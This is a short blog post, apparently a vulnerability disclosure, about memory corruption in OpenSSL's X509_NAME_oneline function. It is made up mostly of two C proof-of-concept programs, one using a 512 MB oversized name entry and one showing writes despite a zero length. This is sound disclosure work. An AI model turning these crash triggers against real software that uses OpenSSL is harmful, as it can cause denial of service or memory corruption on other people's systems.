OpenSSL X509_NAME_oneline memory corruption issues

Posted on by guidovranken

Mem corruption due to oversized input

#include <openssl/x509.h>
#include <string.h>

int main(void)
{
    const size_t stringsize = 536870912;
    unsigned char* str = malloc(stringsize+1);
    if ( !str )
    {
        exit(1);
    }

    memset(str, 0x01, stringsize);
    str[stringsize] = 0x00;
    X509 * x509 = X509_new();
    X509_NAME * name = X509_get_subject_name(x509);
    X509_NAME_add_entry_by_txt(name, "friendlyName",  MBSTRING_ASC, str, -1, -1, 0);
    X509_NAME_oneline(name, 0, 0);
}

Proof that X509_NAME_oneline writes to buffer despite the len parameter being 0:

#include <openssl/x509.h>
#include <string.h>

int main(void)
{
    const size_t stringsize = 1024;
    unsigned char* str = malloc(stringsize+1);
    if ( !str )
    {
        exit(1);
    }

    memset(str, 'x', stringsize);
    str[stringsize] = 0x00;
    X509 * x509 = X509_new();
    X509_NAME * name = X509_get_subject_name(x509);
    X509_NAME_add_entry_by_txt(name, "friendlyName",  MBSTRING_ASC, str, -1, -1, 0);
    // Fictional buf ptr -- but wouldn't crash
    // if X509_NAME_oneline would adhere to the
    // fact that length is 0
    X509_NAME_oneline(name, (char*)1, 0);
}

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.